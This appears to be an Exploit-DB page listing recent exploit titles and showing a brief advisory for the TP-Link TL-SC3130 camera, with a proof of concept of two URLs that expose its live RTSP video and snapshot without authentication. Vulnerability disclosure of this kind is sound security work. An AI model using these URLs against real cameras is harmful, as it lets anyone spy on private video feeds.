635345499a
15 changes to exploits/shellcodes Git Submodule - Arbitrary Code Execution Git Submodule - Arbitrary Code Execution (PoC) Any Sound Recorder 2.93 - Buffer Overflow (SEH) Git Submodule - Arbitrary Code Execution Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials BigTree CMS 4.2.23 - Cross-Site Scripting Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin) TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure Time and Expense Management System 3.0 - 'table' SQL Injection
19 lines
No EOL
608 B
Text
19 lines
No EOL
608 B
Text
# Exploit Title: TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure
|
|
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
|
|
# Date: 2018-10-17
|
|
# Vendor: TP-LINK Technologies Co., Ltd.
|
|
# Product web page: http://www.tp-link.com
|
|
# Affected version: 1.6.18P12_121101
|
|
# Tested on: Boa/0.94.14rc21
|
|
# CVE: N/A
|
|
# References:
|
|
# Advisory ID: ZSL-2018-5497
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5497.php
|
|
|
|
Desc: The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized
|
|
live RTSP stream disclosure.
|
|
|
|
# PoC:
|
|
|
|
http://TARGET/jpg/image.jpg
|
|
rtsp://TARGET:554/video.3gp |